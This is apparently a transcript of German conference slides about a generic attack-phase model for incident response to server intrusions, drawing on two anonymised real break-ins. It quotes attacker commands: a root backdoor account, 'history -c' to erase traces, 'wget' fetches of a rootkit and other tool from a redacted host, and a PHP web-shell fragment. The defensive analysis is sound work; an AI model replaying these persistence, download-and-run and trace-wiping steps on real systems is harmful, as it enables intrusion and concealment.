Generischer Ablauf von Serversystemeinbrüchen Analyse und Konzeption

Größe: px
Ab Seite anzeigen:

Download "Generischer Ablauf von Serversystemeinbrüchen Analyse und Konzeption"

Transkript

1 State-of-the-art Technology for Worldwide Telecommunications Generischer Ablauf von Serversystemeinbrüchen Analyse und Konzeption Denise Muth Hamburg, 0. Februar 03

2 Agenda Generischer Ablauf von Serversystemeinbrüchen 3 Motivation Ergebnisse Fazit & Ausblick I Controlware GmbH I Seite

3 Motivation Trotz vielfältiger Sicherheitsmechanismen können Serversystemeinbrüche im Unternehmenskontext nicht immer verhindert werden. 0 war zweifelsohne das 'Jahr des Hackers'. (RSA, Cybercrime Trends Report 0) Viele der im Unternehmenskontext auftretenden Sicherheitsvorfälle sind auf einbrüche zurückzuführen * ) Bekannte einbrüche: Raumfahrtbehörde NASA, Elektronikkonzern Sony, Rüstungskonzern Lockheed Martin Potentielle Einstiegspunkte in IT-Infrastrukturen stellen Serversysteme mit öffentlicher Netzanbindung dar Überwiegende Ausführung von einbrüchen im Unternehmenskontext durch externe Angreifer * ) * ) Verizon Data Breach Investigations Report, RSA Cybercrime Trends Report, BSI Lagebericht, BSI Register aktueller Cyber-Gefährdungen und -Angriffsformen u.w I Controlware GmbH I Seite 3

4 Motivation Für die Behandlung von Serversystemeinbrüche im Incident Response sind vor allem die Angriffsphasen nach dem erfolgreichen Eindringen entscheidend. Incident Response zur reaktiven Behandlung potentieller Sicherheitsvorfälle wie Serversystemeinbrüche (vgl. DFN-CERT): einbruch Vorbereitung Angriffsphase Pre- ation Nachbereitung Erkennung Angriffsphase Incident Response... Angriffsphase n Kontrollübernahme Post- ation Analyse Eindämmung Behandlungsprozess des Incident Response erfordert tiefergehendes Verständnis über den Ablauf von einbrüchen Einsatz Penetrationstest-Modell? I Controlware GmbH I Seite 4

5 Motivation Für die Behandlung von Serversystemeinbrüche im Incident Response sind vor allem die Angriffsphasen nach dem erfolgreichen Eindringen entscheidend. Incident Response zur reaktiven Behandlung potentieller Sicherheitsvorfälle wie Serversystemeinbrüche (vgl. DFN-CERT): einbruch Vorbereitung Angriffsphase Pre- ation Nachbereitung Erkennung Angriffsphase Incident Response... Angriffsphase n Kontrollübernahme Post- ation Analyse Eindämmung Behandlungsprozess des Incident Response erfordert tiefergehendes Verständnis über den Ablauf von einbrüchen Einsatz Penetrationstest-Modell? I Controlware GmbH I Seite 4

6 Motivation Ein generisches Modell, das speziell Angriffsphasen nach dem Eindringen berücksichtigt, soll das benötigte Wissen dem Incident Response bereitstellen. Analyse generischer Einbruchsmodelle sowie realer Servereinbrüche und Konzeption eines neuen Modells einbruch Angriffsphase Beantwortung der wissenschaftlichen Fragestellungen: Welche Angriffsphasen sollte ein generisches Modell für den Einsatz im Incident Response umfassen? Welche Übergänge sind zwischen den einzelnen Angriffsphasen notwendig? Angriffsphase... Angriffsphase n Unterstützung des Incident Respone bei der reaktiven Behandlung von Serversystemeinbrüchen Incident Response I Controlware GmbH I Seite 5

7 Agenda Generischer Ablauf von Serversystemeinbrüchen 3 Motivation Ergebnisse Fazit & Ausblick I Controlware GmbH I Seite 6

8 Ergebnisse Analyse Analyse Die Entwicklung des neuen, generischen Modells für Serversystemeinbrüche untergliedert sich in die Aufgabengebiete Analyse und Konzeption. Generisches Modell einbruch Analyse Konzeption Modelle Szenarien Incident Response I Controlware GmbH I Seite 7

9 Ergebnisse Analyse: Modelle Die existierenden Einbruchsmodelle fokussieren vorwiegend Angriffsphasen zur Erkundung von en und der Erlangung des Zugangs. NIST-Modell: Discovery Gaining Access Escalating Browsing ation SANS-Modell: Initial Reconnaiss. ning Enumeration Gaining Access Privilege Escalation I Controlware GmbH I Seite 8

10 Ergebnisse Analyse: Szenarien Die Analyse der realen Serversystemeinbrüche erfolgte auf Basis protokollierter Logdaten, die in anonymisierter Form bereitgestellt wurden. cd /tmp ls man ssh-arqbskvt5 uname - uname: zusätzlicher Operand - uname --help gibt weitere Informationen. root@fileserver:/tmp# uname -a Linux fileserver generic #6-Ubuntu SMP Fri Jan 0 5:59:53 UTC 0 i686 i686 i386 GNU/Linux root@fileserver:/tmp# cd /home root@fileserver:/home# ls bert paul sven root@fileserver:/home# adduser wwf Lege Benutzer»wwf«an... Erstelle Home-Verzeichnis»/home/wwf«... Kopiere Dateien aus»/etc/skel«... Geben Sie ein neues UNIX-Passwort ein: Geben Sie das neue UNIX-Passwort erneut ein: passwd: Passwort erfolgreich geändert Benutzerinformationen für wwf werden geändert. Geben Sie einen neuen Wert an oder drücken Sie ENTER für den Standardwert Vollständiger Name []: Raumnummer []: Telefon geschäftlich []: Telefon privat []: Sonstiges []: Sind die Informationen korrekt? [J/n] J Lege neue Gruppe»wwf«(003) an... Lege neuen Benutzer»wwf«(003) mit Gruppe»wwf«an... root@fileserver:/home# nano /etc/passwd root@fileserver:/home# history -c I Controlware GmbH I Seite 9

11 Ergebnisse Analyse: Szenarien Die Analyse der realen Serversystemeinbrüche erfolgte auf Basis protokollierter Logdaten, die in anonymisierter Form bereitgestellt wurden. Angriffsaktivitäten t I Controlware GmbH I Seite 9

12 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t I Controlware GmbH I Seite 0

13 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten Durchführung von SQL Injection-Angriffen t I Controlware GmbH I Seite 0

14 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t I Controlware GmbH I Seite 0

15 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten 3 t Überprüfung des aktiven Datenbankbenutzers, des Datenbankschema etc I Controlware GmbH I Seite 0

16 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten 3 4 t <?php ($_POST[ cmd ]);?> I Controlware GmbH I Seite 0

17 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t 6 Einrichtung c_99madshell.php I Controlware GmbH I Seite 0

18 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t 6 7 Übertragung der Datenbankbenutzer I Controlware GmbH I Seite 0

19 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t Einrichtung rss.php I Controlware GmbH I Seite 0

20 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t Verwendung rss.php I Controlware GmbH I Seite 0

21 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t Manipulation 9 regulärer Skriptdateien I Controlware GmbH I Seite 0

22 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t Verwendung C_99madshell.php I Controlware GmbH I Seite 0

23 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t Manipulation regulärer Skriptdateien I Controlware GmbH I Seite 0

24 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten I Controlware GmbH I Seite

25 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten Durchführung eines Portscans I Controlware GmbH I Seite

26 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten Durchführung eines Brute Force-Angriffs I Controlware GmbH I Seite

27 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten 3 Auswahl eines Zielobjekts I Controlware GmbH I Seite

28 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten 3 4 Überprüfung der Version des Betriebssystemkernels und der Verzeichnisinhalte wie /home/ und /temp/ I Controlware GmbH I Seite

29 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten Einrichtung des Benutzers wwf mit Rootrechten I Controlware GmbH I Seite

30 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten history -c I Controlware GmbH I Seite

31 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten wget xxx.xx.xxx/rootkit I Controlware GmbH I Seite

32 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten /Rootkit I Controlware GmbH I Seite

33 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten Löschen der angelegten Dateien und eingegebenen Befehle I Controlware GmbH I Seite

34 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten /sbin/ifconfig ; /proc/cpuinfo I Controlware GmbH I Seite

35 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten wget xxx.xx.xxx/ner I Controlware GmbH I Seite

36 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten /ner I Controlware GmbH I Seite

37 Ergebnisse Konzeption Konzeption Die Entwicklung des neuen, generischen Modells für Serversystemeinbrüche untergliedert sich in die Aufgabengebiete Analyse und Konzeption. Generisches Modell einbruch Analyse Konzeption Modelle Szenarien Incident Response I Controlware GmbH I Seite

38 Ergebnisse Konzeption: Pre- und Die Funktionsweise der Einbruchsmodelle wird anhand einer Zuordnung der Angriffsaktivitäten zu den entsprechenden Modellphasen untersucht. Discovery Gaining A. Escal. P. B. ation NIST ning Enumerat. Gaining A. Privil. E. Estab. B. T. SANS t I Controlware GmbH I Seite 3

39 Ergebnisse Konzeption: Pre- und Die Zuordnung des Web-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf t I Controlware GmbH I Seite 4

40 Ergebnisse Konzeption: Pre- und Die Zuordnung des Web-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf. Discovery Gaining A. Escal. P. B. ation NIST t I Controlware GmbH I Seite 4

41 Ergebnisse Konzeption: Pre- und Die Zuordnung des Web-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf.??? Discovery Gaining A. Escal. P. B. ation NIST t I Controlware GmbH I Seite 4

42 Ergebnisse Konzeption: Pre- und Die Zuordnung des Web-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf. ning Discovery Gaining A. Escal. P. B. ation NIST Enumerat. Gaining A.??? Privil. E. Estab. B. T. SANS t I Controlware GmbH I Seite 4

43 Ergebnisse Konzeption: Pre- und Die Zuordnung des Web-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf.??? Discovery Gaining A. Escal. P. B. ation NIST ning Enumerat. Gaining A. Privil. E.? Estab. B.? T.? SANS t I Controlware GmbH I Seite 4

44 Ergebnisse Konzeption: Pre- und Die Zuordnung des SSH-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf t I Controlware GmbH I Seite 5

45 Ergebnisse Konzeption: Pre- und Die Zuordnung des SSH-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf. Discovery Gaining A. Escal. P. B. ation NIST t I Controlware GmbH I Seite 5

46 Ergebnisse Konzeption: Pre- und Die Zuordnung des SSH-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf. Discovery Gaining A. B. ation NIST Escal. P.?? t I Controlware GmbH I Seite 5

47 Ergebnisse Konzeption: Pre- und Die Zuordnung des SSH-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf. Discovery Gaining A. B. ation NIST Escal. P.?? ning Enumerat. Gaining A. Privil. E. Estab. B. T. SANS t I Controlware GmbH I Seite 5

48 Ergebnisse Konzeption: Pre- und Die Zuordnung des SSH-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf. ning Discovery Gaining A. B. ation NIST Enumerat. Gaining A. Privil. E. Estab. B.? Escal. P.???? T. SANS t I Controlware GmbH I Seite 5

49 Ergebnisse Konzeption: Pre- und Ein neues Modell für das Incident Response erfordert zusätzliche sowie stärker unterteilte Angriffsphasen und flexiblere Übergänge in der. : Unterscheidung zwischen Informationssuche und Schwachstellensuche Erlangung des zugangs unter Verwendung einer Schwachstelle oder eines s : Beginnt in der Regel mit der Untersuchung des zu Grunde liegenden s Danach erhebliche Dynamik im Ablauf und folglich der Anordnung der Angriffsphasen Unterscheidung zwischen Herunterladen und ieren zusätzlicher Werkzeuge I Controlware GmbH I Seite 6

50 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt I Controlware GmbH I Seite 7

51 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Information Durchführung eines Portscans I Controlware GmbH I Seite 7

52 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Information Durchführung eines Brute Force-Angriffs I Controlware GmbH I Seite 7

53 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Information Auswahl eines Zielobjekts I Controlware GmbH I Seite 7

54 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Information Untersuchung der Verzeichnisinhalte wie /home/ und /temp/ I Controlware GmbH I Seite 7

55 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Information Item wget xxx.xx.xxx/rootkit I Controlware GmbH I Seite 7

56 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Item Information./Rootkit I Controlware GmbH I Seite 7

57 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Item Information Anlegen des Benutzers wwf mit Rootrechten I Controlware GmbH I Seite 7

58 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Item Information I Controlware GmbH I Seite 7

59 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Item Information I Controlware GmbH I Seite 7

60 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Information./ner Item wget xxx.xx.xxx/ner I Controlware GmbH I Seite 7

61 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Item Information Löschen der angelegten Dateien und eingegebenen Befehle I Controlware GmbH I Seite 7

62 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Item Information I Controlware GmbH I Seite 7

63 Agenda Generischer Ablauf von Serversystemeinbrüchen 3 Motivation Ergebnisse Fazit & Ausblick I Controlware GmbH I Seite 8

64 Fazit & Ausblick Das generische Modell beantwortet die zentralen Fragen und unterstützt das Incident Response bei der Behandlung von Seversystemeinbrüchen. Generisches Modell einbruch Analyse Konzeption Modelle Szenarien Incident Response I Controlware GmbH I Seite 9

65 Fazit & Ausblick Das generische Modell beantwortet die zentralen Fragen und unterstützt das Incident Response bei der Behandlung von Seversystemeinbrüchen. Entscheidende Mischung aus theoretischer Fundierung und praktischer Relevanz Analyse Generisches Modell einbruch Konzeption Berücksichtigung von Angriffsphasen nicht nur vor, sondern auch nach dem Eindringen in ein Serversystem Modelle Szenarien Incident Response Pre- ation Post- ation Beantwortung der zu Beginn gestellten, zentralen Fragestellungen: Welche Angriffsphasen sollte ein generisches Modell für den Einsatz im Incident Response umfassen? Welche Übergänge sind zwischen den einzelnen Angriffsphasen notwendig? Anreicherung des neuen Modells um typische Spuren der jeweiligen Angriffsphasen Ergänzung des organisatorischen Behandlungsprozesses des Incident Response um ein technisches Einbruchsschema I Controlware GmbH I Seite 9

66 Agenda Generischer Ablauf von Serversystemeinbrüchen 3 Motivation Ergebnisse Fazit & Ausblick I Controlware GmbH I Seite 0

67 Agenda Generischer Ablauf von Serversystemeinbrüchen 3 Motivation Ergebnisse Fazit & Ausblick? FRAGEN I Controlware GmbH I Seite 0

68 State-of-the-art Technology for Worldwide Telecommunications Vielen Dank für Ihre Aufmerksamkeit! Thank you very much for your attention! Merci beaucoup pour votre attention! Gracias por su atención! Denise Muth KoSI-Studentin Controlware GmbH Waldstrasse Dietzenbach Denise.Muth@controlware.de

Einrichten des fhb-wlan

Einrichten des fhb-wlan Einrichten des fhb-wlan Diese Anleitung wurde erstellt von Dirk Dahse. Fragen zur Einrichtung bitte an: wlanadmin@fh-brandenburg.de Diese Anleitung befasst sich mit der grundlegenden manuellen Einrichtung

Mehr

Update / Inbetriebnahme domovea Server. Update/Inbetriebnahme domovea Server Technische Änderungen vorbehalten

Update / Inbetriebnahme domovea Server. Update/Inbetriebnahme domovea Server Technische Änderungen vorbehalten Update / Inbetriebnahme domovea Server 1 Vor der Inbetriebnahme Es muss sicher gestellt sein, dass Microsoft.Net Framework 4.0 installiert ist (bei Windows 7 bereits integriert). Achten Sie auf die richtige

Mehr

Nach der Installation des FolderShare-Satellits wird Ihr persönliches FolderShare -Konto erstellt.

Nach der Installation des FolderShare-Satellits wird Ihr persönliches FolderShare -Konto erstellt. FolderShare Installation & Konfiguration Installation Eine kostenlose Version von FolderShare kann unter http://www.foldershare.com/download/ heruntergeladen werden. Sollte die Installation nicht automatisch

Mehr

Microsoft Access 2010 Navigationsformular (Musterlösung)

Microsoft Access 2010 Navigationsformular (Musterlösung) Hochschulrechenzentrum Justus-Liebig-Universität Gießen Microsoft Access 2010 Navigationsformular (Musterlösung) Musterlösung zum Navigationsformular (Access 2010) Seite 1 von 5 Inhaltsverzeichnis Vorbemerkung...

Mehr

LANiS Mailversender ( Version 1.2 September 2006)

LANiS Mailversender ( Version 1.2 September 2006) LANiS-Mailversender (V 1.2) Installation und Bedienung 1 LANiS Mailversender ( Version 1.2 September 2006) Im LANiS- Schülermodul und im LANiS-Lehrermodul gibt es die Möglichkeit, Dateien aus der Schule

Mehr

MORE Profile. Pass- und Lizenzverwaltungssystem. Stand: 19.02.2014 MORE Projects GmbH

MORE Profile. Pass- und Lizenzverwaltungssystem. Stand: 19.02.2014 MORE Projects GmbH MORE Profile Pass- und Lizenzverwaltungssystem erstellt von: Thorsten Schumann erreichbar unter: thorsten.schumann@more-projects.de Stand: MORE Projects GmbH Einführung Die in More Profile integrierte

Mehr

Synchronisations- Assistent

Synchronisations- Assistent TimePunch Synchronisations- Assistent Benutzerhandbuch Gerhard Stephan Softwareentwicklung -und Vertrieb 25.08.2011 Dokumenten Information: Dokumenten-Name Benutzerhandbuch, Synchronisations-Assistent

Mehr

Historical Viewer. zu ETC5000 Benutzerhandbuch 312/15

Historical Viewer. zu ETC5000 Benutzerhandbuch 312/15 Historical Viewer zu ETC5000 Benutzerhandbuch 312/15 Inhaltsverzeichnis 1 Allgemeine Hinweise... 3 1.1 Dokumentation...3 2 Installation... 3 3 Exportieren der Logdatei aus dem ETC 5000... 3 4 Anlegen eines

Mehr

Anleitung zur KAT-Datenbank Qualitrail Eingabe Futtermittel

Anleitung zur KAT-Datenbank Qualitrail Eingabe Futtermittel Anleitung zur KAT-Datenbank Qualitrail Eingabe Futtermittel Die KAT-Datenbank ist unter dem Link www.kat-datenbank.de zu erreichen. Sie melden sich mit Ihrem Benutzernamen und dem entsprechenden Passwort

Mehr

In diesem Bereich wird beschrieben, wie Sie eine Datensicherung der Software Jack Plus durchführen können.

In diesem Bereich wird beschrieben, wie Sie eine Datensicherung der Software Jack Plus durchführen können. Datensicherung Jack Inhalt Allgemeines Warum muss eine Datensicherung durchgeführt werden Wohin werden Daten gesichert Was soll von Jack alles gesichert werden Vorbereitungen zur Datensicherung Datensicherung

Mehr

Umzug der abfallwirtschaftlichen Nummern /Kündigung

Umzug der abfallwirtschaftlichen Nummern /Kündigung Umzug der abfallwirtschaftlichen Nummern /Kündigung Um sich bei ebegleitschein abzumelden/ zu kündigen sind folgende Schritte notwendig: Schritt 1: Sie erteilen bifa Umweltinstitut GmbH den Auftrag, Ihre

Mehr

Abwesenheitsnotiz im Exchange Server 2010

Abwesenheitsnotiz im Exchange Server 2010 Abwesenheitsnotiz im Exchange Server 2010 1.) Richten Sie die Abwesenheitsnotiz in Outlook 2010 ein und definieren Sie, an welche Absender diese gesendet werden soll. Klicken Sie dazu auf Datei -> Informationen

Mehr

ec@ros2-installer ecaros2 Installer procar informatik AG 1 Stand: FS 09/2012 Eschenweg 7 64331 Weiterstadt

ec@ros2-installer ecaros2 Installer procar informatik AG 1 Stand: FS 09/2012 Eschenweg 7 64331 Weiterstadt ecaros2 Installer procar informatik AG 1 Stand: FS 09/2012 Inhaltsverzeichnis 1 Download des ecaros2-installer...3 2 Aufruf des ecaros2-installer...3 2.1 Konsolen-Fenster (Windows)...3 2.2 Konsolen-Fenster

Mehr

In diesem Bereich wird beschrieben, wie Sie eine Datensicherung der Software Jack Plus durchführen können.

In diesem Bereich wird beschrieben, wie Sie eine Datensicherung der Software Jack Plus durchführen können. Datensicherung Jack Inhalt Allgemeines Warum muss eine Datensicherung durchgeführt werden Wohin werden Daten gesichert Was soll von Jack alles gesichert werden Vorbereitungen zur Datensicherung Datensicherung

Mehr

Aktualisierung des Internet-Browsers

Aktualisierung des Internet-Browsers Marketingtipp Aktualisierung des Internet-Browsers Landesverband Bauernhof- und Landurlaub Bayern e.v. Was ist ein Internet-Browser? Der Internet-Browser ist das Programm, das Sie benutzen um im Internet

Mehr

User Manual Data 24. Login und Layout

User Manual Data 24. Login und Layout User Manual Data 24 Login und Layout Auf der Loginseite www.kern.data24.ch geben Sie Ihren Benutzernamen sowie Ihr Kennwort in die beiden Felder ein. Mit Klick auf den Button «Anmeldung» werden Ihre Daten

Mehr

Erfolgreiche berufliche Ausbildung von Menschen mit Migrationshintergrund durch erfolgreiche Lehrkräfte und Ausbildende

Erfolgreiche berufliche Ausbildung von Menschen mit Migrationshintergrund durch erfolgreiche Lehrkräfte und Ausbildende Erfolgreiche berufliche Ausbildung von Menschen mit Migrationshintergrund durch erfolgreiche Lehrkräfte und Ausbildende Standards für die Aus- und Weiterbildung von pädagogischen Professionals im Umgang

Mehr

CERTQUA-Servicecenter Nahtlose IT-Anbindung per Schnittstelle

CERTQUA-Servicecenter Nahtlose IT-Anbindung per Schnittstelle CERTQUA-Servicecenter Nahtlose IT-Anbindung per Bequeme Maßnahmenverwaltung mit automatischem Datenaustausch Bequem Manuelle Dateneingabe entfällt Sicher Verschlüsselter Datentransfer Zeitsparend Schnelle

Mehr

Dieses UPGRADE konvertiert Ihr HOBA-Finanzmanagement 6.2 in die neue Version 6.3. Ein UPGRADE einer DEMO-Version ist nicht möglich.

Dieses UPGRADE konvertiert Ihr HOBA-Finanzmanagement 6.2 in die neue Version 6.3. Ein UPGRADE einer DEMO-Version ist nicht möglich. UPGRADE Version 6.2 -> Version 6.3 Dieses UPGRADE konvertiert Ihr HOBA-Finanzmanagement 6.2 in die neue Version 6.3. Ein UPGRADE einer DEMO-Version ist nicht möglich. Bitte beachten Sie, dass das UPGRADE

Mehr

Word 2010 Schnellbausteine

Word 2010 Schnellbausteine WO.001, Version 1.0 02.04.2013 Kurzanleitung Word 2010 Schnellbausteine Word 2010 enthält eine umfangreiche Sammlung vordefinierter Bausteine, die sogenannten "Schnellbausteine". Neben den aus den früheren

Mehr

Gezielt über Folien hinweg springen

Gezielt über Folien hinweg springen Gezielt über Folien hinweg springen Nehmen wir an, Sie haben eine relativ große Präsentation. Manchmal möchten Sie über Folien hinweg zu anderen Folien springen. Das kann vorkommen, weil Sie den gesamten

Mehr

Unified Communication Client Installation Guide

Unified Communication Client Installation Guide Unified Communication Client Installation Guide Tel. 0800 888 310 business.upc.ch Corporate Network Internet Phone TV 1. Systemanforderungen UPC UC-Client 1.1 Betriebssystem Microsoft Windows Vista Microsoft

Mehr

ecaros2 - Accountmanager

ecaros2 - Accountmanager ecaros2 - Accountmanager procar informatik AG 1 Stand: FS 09/2012 Inhaltsverzeichnis 1 Aufruf des ecaros2-accountmanager...3 2 Bedienung Accountmanager...4 procar informatik AG 2 Stand: FS 09/2012 1 Aufruf

Mehr

Lehrer: Einschreibemethoden

Lehrer: Einschreibemethoden Lehrer: Einschreibemethoden Einschreibemethoden Für die Einschreibung in Ihren Kurs gibt es unterschiedliche Methoden. Sie können die Schüler über die Liste eingeschriebene Nutzer Ihrem Kurs zuweisen oder

Mehr

Regiosystem So geht s! I. Social-Media-Icons neu verlinken 3. II. Newsbeiträge erstellen 4. III. Termin erstellen 7. IV. Videos aktualisieren 7

Regiosystem So geht s! I. Social-Media-Icons neu verlinken 3. II. Newsbeiträge erstellen 4. III. Termin erstellen 7. IV. Videos aktualisieren 7 I. Social-Media-Icons neu verlinken 3 II. Newsbeiträge erstellen 4 III. Termin erstellen 7 IV. Videos aktualisieren 7 V. Eigenen Banner einfügen 9 VI. Seitenstruktur gestalten 12 Junge Liberale e.v. 2/12

Mehr

Informatik. Christoph Treude. Elektronisches Geld. Studienarbeit

Informatik. Christoph Treude. Elektronisches Geld. Studienarbeit Informatik Christoph Treude Elektronisches Geld Studienarbeit Universität Siegen Fachbereich 12 Elektrotechnik und Informatik Seminararbeit Elektronisches Geld (Informatik und Gesellschaft) Christoph

Mehr

Energienetz Elbmarsch - Förderverein für eine Energiewende in der Elbmarsch

Energienetz Elbmarsch - Förderverein für eine Energiewende in der Elbmarsch Der Förderverein Energienetz Elbmarsch Förderverein für eine Energiewende in der Elbmarsch ist eine dem Gemeinnutz verpflichtete überparteiliche Initiative. Viele engagieren sich bereits, jede/r ist herzlich

Mehr

99 Backdoors on my UNIX Host Über die Probleme nach einem Sicherheitsvorfall

99 Backdoors on my UNIX Host Über die Probleme nach einem Sicherheitsvorfall State-of-the-art Technology for Worldwide Telecommunications Über die Probleme nach einem Sicherheitsvorfall Andreas Bunten GUUG-Frühjahrsfachgespräch 2012 01.03.2012 I Controlware GmbH I Seite 1 Wie man

Mehr

Vereine neu anlegen oder bearbeiten

Vereine neu anlegen oder bearbeiten Vereine neu anlegen oder bearbeiten Um einen neuen Verein zu erfassen oder einen bestehenden Verein zu bearbeiten, gehen Sie in der Navigationsleiste zum Bereich Kultur und Freizeit Vereine und klicken

Mehr

Um die Rücklagen ordnungsgemäß zu verbuchen, ist es wichtig, Schritt-für-Schritt vorzugehen:

